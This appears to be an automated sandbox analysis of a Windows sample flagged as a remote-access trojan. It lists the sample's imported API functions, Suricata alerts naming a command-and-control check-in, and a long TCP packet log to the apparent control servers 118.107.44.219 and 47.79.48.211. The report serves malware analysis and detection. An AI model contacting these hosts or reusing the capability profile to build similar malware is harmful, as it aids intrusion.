                                                                                                                          gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetEnhMetaFileBits, SetDIBitsToDevice, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, OffsetRgn, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateFontA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
                                                                                                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                          kernel32.dlllstrlenA, lstrcpyA, lstrcmpA, WriteProcessMemory, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, TryEnterCriticalSection, TerminateThread, TerminateProcess, SwitchToThread, SuspendThread, SleepEx, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetHandleInformation, SetFileTime, SetFilePointer, SetEvent, SetErrorMode, SetEnvironmentVariableA, SetEndOfFile, SetCurrentDirectoryA, SearchPathA, ResumeThread, ResetEvent, ReleaseMutex, ReadProcessMemory, ReadFile, QueueUserAPC, PulseEvent, PostQueuedCompletionStatus, OpenProcess, OpenMutexA, OpenFileMappingA, OpenEventA, MultiByteToWideChar, MulDiv, MoveFileA, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVolumeInformationA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatus, GetProcessTimes, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileType, GetFileSize, GetFileInformationByHandle, GetFileAttributesA, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FlushInstructionCache, FlushFileBuffers, FindResourceA, FindNextFileA, FindNextChangeNotification, FindFirstFileA, FindFirstChangeNotificationA, FindCloseChangeNotification, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitThread, EnumCalendarInfoA, EnterCriticalSection, DuplicateHandle, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessW, CreatePipe, CreateMutexA, CreateIoCompletionPort, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle
                                                                                                                          advapi32.dllSetSecurityDescriptorDacl, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey, InitializeSecurityDescriptor, GetUserNameA
                                                                                                                          kernel32.dllSleep
                                                                                                                          ole32.dllCLSIDFromString, CoTaskMemFree, StringFromCLSID
                                                                                                                          oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitializeEx, CoInitialize
                                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                          comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                          shell32.dllShell_NotifyIconA, ShellExecuteA, SHGetFileInfoA
                                                                                                                          shell32.dllSHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder, SHBrowseForFolderA
                                                                                                                          comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                                                                                                                          advapi32.dllCreateProcessAsUserW
                                                                                                                          kernel32.dllSwitchToThread, MapViewOfFile, VirtualQuery, VirtualAlloc, VirtualProtect, GetSystemInfo
                                                                                                                          ntdll.dllRtlAnsiStringToUnicodeString, RtlUnicodeStringToAnsiString, RtlFreeAnsiString, NtQueryMutant, NtCreateMutant, NtWaitForSingleObject, NtTerminateProcess, NtQueryVirtualMemory, NtUnmapViewOfSection, NtOpenSection, NtCreateSection, NtQueryObject, NtClose, NtCurrentTeb, NtQuerySystemInformation
                                                                                                                          rpcrt4.dllUuidCreate, RpcStringFreeA, UuidFromStringA, UuidToStringA
                                                                                                                          kernel32.dllSignalObjectAndWait, InterlockedCompareExchange, FindNextFileA, FindFirstFileA, GetComputerNameExA
                                                                                                                          wsock32.dllWSACleanup, WSAStartup, WSAGetLastError, gethostbyname, shutdown, setsockopt, ioctlsocket, inet_addr, htons, getsockname, getpeername, connect, closesocket
                                                                                                                          ws2_32.dllWSAEnumNetworkEvents, WSAEventSelect, WSAGetOverlappedResult, WSASend, WSARecv, WSASocketA

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States
                                                                                                                          HebrewIsrael
                                                                                                                          RussianRussia

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2025-01-04T05:38:50.993382+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449743118.107.44.21919091TCP
                                                                                                                          2025-01-04T05:40:01.363847+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449744118.107.44.21919091TCP
                                                                                                                          2025-01-04T05:41:05.444765+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.450012118.107.44.21919091TCP
                                                                                                                          2025-01-04T05:42:18.020381+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.450012118.107.44.21919091TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 4, 2025 05:38:15.355526924 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:15.360588074 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:15.360697031 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.158576012 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158648014 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158658981 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158663988 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158674955 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158695936 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158706903 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158718109 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158730030 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158744097 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.158761024 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.158824921 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.163661003 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.163686991 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.163698912 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.163708925 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.163752079 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.163832903 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.207371950 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.376235962 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376250982 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376257896 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376276016 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376286983 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376358032 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376368999 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376507998 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.377218008 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377235889 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377247095 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377258062 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377269983 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377283096 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.377295971 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.377315998 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378125906 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378138065 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378148079 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378159046 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378170013 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378186941 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378201008 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378839970 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378851891 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378863096 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378875971 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378895998 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378920078 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378933907 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378969908 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.379733086 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.426243067 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.593610048 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593617916 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593622923 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593679905 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593696117 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593708992 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593719959 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593760014 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.593801022 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594127893 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594192028 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594211102 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594223976 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594234943 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594263077 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594264030 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594274998 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594312906 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594789028 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594841957 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594871998 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594883919 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594894886 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594923973 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594969034 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594980001 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594990969 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595001936 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595014095 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595038891 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595751047 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595763922 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595776081 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595817089 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595848083 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595917940 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595930099 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595941067 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595952034 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595964909 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595967054 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596004963 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596733093 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596745014 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596757889 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596786976 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596793890 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596807003 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596806049 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596822023 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596859932 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596867085 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596880913 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596909046 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.597634077 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.597708941 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811229944 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811290979 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811296940 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811307907 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811321974 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811332941 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811347008 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811358929 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811364889 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811376095 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811393976 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811407089 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811501980 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811501980 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811719894 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811734915 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811748981 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811762094 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811774969 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811788082 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811789989 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811800003 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811841011 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812117100 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812131882 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812144041 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812170982 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812175989 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812189102 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812202930 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812215090 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812221050 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812247038 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812283993 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812335968 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812376022 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.817200899 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.049874067 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.054824114 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.054904938 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.264259100 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:21.264309883 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.264678001 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:21.305592060 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:21.305630922 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828403950 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828425884 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828437090 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828453064 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828463078 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828475952 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828485966 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.828500986 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828514099 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828526020 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828528881 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.828563929 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828564882 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.828598976 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.833446980 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.833458900 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.833471060 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.833504915 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.879177094 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.037292004 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037319899 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037332058 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037345886 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037358046 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037367105 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.037403107 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.037741899 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037754059 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037766933 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037780046 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.037797928 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.037825108 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.038481951 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.038494110 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.038506031 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.038521051 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.038530111 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.038532019 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.038563013 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.038588047 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.039269924 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.039282084 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.039293051 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.039330006 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.039351940 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.039362907 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.039396048 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.040101051 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.040121078 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.040132046 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.040146112 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.040177107 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.246052027 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246071100 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246113062 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246119976 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.246165991 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246177912 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246196032 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246207952 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246207952 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.246241093 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.246244907 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246285915 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.246822119 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246845007 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246855974 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246887922 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.246895075 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.246936083 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:22.247350931 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.247363091 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.247386932 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:22.247396946 CET885349734118.107.44.219192.168.2.4
